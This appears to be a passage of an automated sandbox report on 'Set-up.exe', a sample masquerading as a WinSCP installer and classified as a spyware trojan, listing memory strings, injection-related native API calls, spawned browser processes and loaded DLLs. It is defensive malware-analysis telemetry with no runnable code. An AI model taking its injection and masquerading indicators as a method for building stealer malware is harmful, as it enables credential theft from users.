Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe	String found in binary or memory: https://filezilla-project.org/bThis
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-up.exe	String found in binary or memory: https://github.com/UweRaabe/PngComponents
Source: Set-up.exe	String found in binary or memory: https://github.com/bji/libs30https://github.com/bji/libs3/blob/master/LICENSE$Error
Source: Set-up.exe	String found in binary or memory: https://github.com/plashenkov/TBX
Source: Set-up.exe	String found in binary or memory: https://jcl.delphi-jedi.org/
Source: Set-up.exe	String found in binary or memory: https://jrsoftware.org/tb2kdl.php
Source: Set-up.exe	String found in binary or memory: https://libexpat.github.io/?https://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html
Source: Set-up.exe	String found in binary or memory: https://notroj.github.io/neon/
Source: Set-up.exe	String found in binary or memory: https://openssl-library.org/)WebDAV/HTTP
Source: Set-up.exe	String found in binary or memory: https://winscp.net/#https://winscp.net/eng/docs/history
Source: Set-up.exe	String found in binary or memory: https://winscp.net/D
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/docs/?ver=%s&lang=%s-https://winscp.net/eng/docs/%s?ver=%s&lang=%s
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/donate.php
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/translations.php:https://winscp.net/eng/docs/search.php?ver=%s&lang=%s&q=%sKh
Source: Set-up.exe	String found in binary or memory: https://winscp.net/forum/
Source: Set-up.exe	String found in binary or memory: https://winscp.net/updates.php#https://winscp.net/eng/download.php
Source: Set-up.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-up.exe	String found in binary or memory: https://www.fsf.org/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026711E5 CreateThread,malloc,NtClose,free,	0_2_026711E5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267066E NtProtectVirtualMemory,	0_2_0267066E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_02670B72
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670CD8 NtAllocateVirtualMemory,	0_2_02670CD8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026710E8 NtClose,	0_2_026710E8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026719C5 free,NtClose,free,	0_2_026719C5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267114C NtClose,	0_2_0267114C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02671084 NtClose,	0_2_02671084
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02688419 NtWriteVirtualMemory,	0_2_02688419
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026884E0 NtWow64QueryInformationProcess64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026884E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0 NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D2039 NtAllocateVirtualMemory,	0_2_043D2039
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D208C NtFreeVirtualMemory,	0_2_043D208C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D20CA NtProtectVirtualMemory,	0_2_043D20CA

Detected potential crypto function

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D003E	0_2_043D003E

One or more processes crash

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144

Sample file is different than original file name gathered from version info

Source: Set-up.exe, 00000000.00000000.1342881075.0000000000D46000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe, 00000000.00000000.1347349204.0000000001E18000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe

Uses 32bit PE files

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/49@1/1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_043D0D3F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_043D0D3F

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Code function: 1_2_0000000140001130 LoadLibraryA,CoInitializeEx,allocator,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CoCreateInstance,

1_2_0000000140001130

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1380
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3832

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3a74326-2ebc-43e9-ac64-3fe40897303f

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: kernel32LoadLibraryExA\/AddDllDirectory\<
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:58:50+01:00" xmp:ModifyDate="2022-09-01T10:59:47+01:00" xmp:MetadataDate="2022-09-01T10:59:47+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" xmpMM:DocumentID="adobe:docid:photoshop:1fdce7f7-d0f3-8345-8210-9a399dc0c608" xmpMM:OriginalDocumentID="xmp.did:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c" stEvt:when="2022-06-27T15:58:50+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" stEvt:when="2022-09-01T10:59:47+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:59:46+01:00" xmp:ModifyDate="2022-09-01T11:07:26+01:00" xmp:MetadataDate="2022-09-01T11:07:26+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" xmpMM:DocumentID="adobe:docid:photoshop:38f42b90-13ae-6648-ac1e-ffa02882af0e" xmpMM:OriginalDocumentID="xmp.did:c0055a1b-163f-6548-addc-8e97eea98b83"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:c0055a1b-163f-6548-addc-8e97eea98b83" stEvt:when="2022-06-27T15:59:46+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" stEvt:when="2022-09-01T11:07:26+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 204
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 152
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 228
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 23057920 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0xe2c400
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x267800
Source: Set-up.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x473600

Source: Set-up.exe	Static PE information: More than 200 imports for KERNEL32.DLL
Source: Set-up.exe	Static PE information: More than 200 imports for USER32.DLL

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

PE file contains sections with non-standard names

Source: Set-up.exe

Static PE information: section name: .didata

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
